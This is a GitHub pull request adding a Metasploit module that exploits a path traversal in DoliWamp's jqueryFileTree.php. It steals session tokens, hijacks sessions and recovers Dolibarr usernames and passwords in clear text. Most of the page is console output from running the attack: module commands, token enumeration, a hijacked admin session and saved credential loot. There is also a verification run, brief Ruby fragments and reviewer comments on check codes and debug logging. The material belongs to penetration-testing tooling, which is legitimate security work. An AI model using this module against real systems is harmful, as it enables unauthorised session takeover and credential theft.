Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module #2940

Merged
merged 1 commit into from Feb 10, 2014

bcoles commented Feb 3, 2014

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module.

Steals session tokens, attempts to hijack each session and gathers the user's username and password in clear text.

Example Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[+] 192.168.237.138:80 - Found credentials (admin:admin)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed

Example Verbose Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[*] 192.168.237.138:80 - Trying to hijack a session -   1.56% done (1/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   3.12% done (2/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   4.69% done (3/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   6.25% done (4/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   7.81% done (5/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   9.38% done (6/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  10.94% done (7/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  12.50% done (8/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  14.06% done (9/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  15.62% done (10/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  17.19% done (11/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  18.75% done (12/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  20.31% done (13/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  21.88% done (14/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  23.44% done (15/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  25.00% done (16/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  26.56% done (17/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  28.12% done (18/64 tokens)
[+] 192.168.237.138:80 - Hijacked session for user with ID '1'
[*] 192.168.237.138:80 - Retrieving user's credentials
[+] 192.168.237.138:80 - Found credentials (admin:admin)
[*] 192.168.237.138:80 - Trying to hijack a session -  29.69% done (19/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  31.25% done (20/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  32.81% done (21/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  34.38% done (22/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  35.94% done (23/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  37.50% done (24/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  39.06% done (25/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  40.62% done (26/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  42.19% done (27/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  43.75% done (28/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  45.31% done (29/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  46.88% done (30/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  48.44% done (31/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  50.00% done (32/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  51.56% done (33/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  53.12% done (34/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  54.69% done (35/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  56.25% done (36/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  57.81% done (37/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  59.38% done (38/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  60.94% done (39/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  62.50% done (40/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  64.06% done (41/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  65.62% done (42/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  67.19% done (43/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  68.75% done (44/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  70.31% done (45/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  71.88% done (46/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  73.44% done (47/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  75.00% done (48/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  76.56% done (49/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  78.12% done (50/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  79.69% done (51/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  81.25% done (52/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  82.81% done (53/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  84.38% done (54/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  85.94% done (55/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  87.50% done (56/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  89.06% done (57/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  90.62% done (58/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  92.19% done (59/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  93.75% done (60/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  95.31% done (61/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  96.88% done (62/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  98.44% done (63/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 100.00% done (64/64 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed
vprint_good("#{peer} - Hijacked session for user with ID '#{user_id}'")
return user_id
else
# print_debug("#{peer} - Could not hijack session. Session is invalid.")
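
Review bot: In the `else` branch the only diagnostic is the commented-out `print_debug` line, so a rejected token leaves no trace even with VERBOSE set. Either restore it as a verbose-level message (for example `vprint_status`, alongside the `vprint_good` used in the success branch) or delete the dead comment, so the failure path is as visible as the success path.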

wchen-r7 Feb 3, 2014


Did you mean to leave this commented out? Looks like useful info for debugging purposes.

# Check for session tokens in 'tmp'
#
def check
get_session_tokens ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown
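
Review bot: The ternary in `check` only sees a truthy or falsy result from `get_session_tokens`, so a failed request and a response that lists no tokens both come back as `Exploit::CheckCode::Unknown`. If the method cannot tell those cases apart, return `Exploit::CheckCode::Safe` in the falsy branch; if it can be made to signal a failed request separately, keep `Unknown` for that case only. The comment above `def check` should also state which result maps to which check code.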

wchen-r7 Feb 3, 2014


You should only be using Unknown when you've failed to collect some info during the process due to a timeout or something. Your get_session_tokens method doesn't really return that type of info, so all you can do is flag it Safe here.

@wchen-r7 wchen-r7 self-assigned this Feb 10, 2014

wchen-r7 commented Feb 10, 2014

Processing.

wchen-r7 added a commit that referenced this pull request Feb 10, 2014
@wchen-r7 wchen-r7 merged commit 9b9b2fa into rapid7:master Feb 10, 2014
1 check passed
default The Travis CI build passed

wchen-r7 commented Feb 10, 2014

Verification:

msf auxiliary(doliwamp_traversal_creds) > run

[*] 10.*.***.***:8181 - Finding session tokens...
[+] 10.*.***.***:8181 - Found 8 session tokens
[*] 10.*.***.***:8181 - Trying to hijack a session...
[*] 10.*.***.***:8181 - Trying to hijack a session -  12.50% done (1/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  25.00% done (2/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  37.50% done (3/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  50.00% done (4/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  62.50% done (5/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  75.00% done (6/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  87.50% done (7/8 tokens)
[+] 10.*.***.***:8181 - Hijacked session for user with ID '1'
[*] 10.*.***.***:8181 - Retrieving user's credentials
[+] 10.*.***.***:8181 - Found credentials (admin:********)
[*] 10.*.***.***:8181 - Trying to hijack a session - 100.00% done (8/8 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     ********  Yes   
@bcoles bcoles deleted the bcoles:doliwamp_traversal_creds branch Apr 6, 2014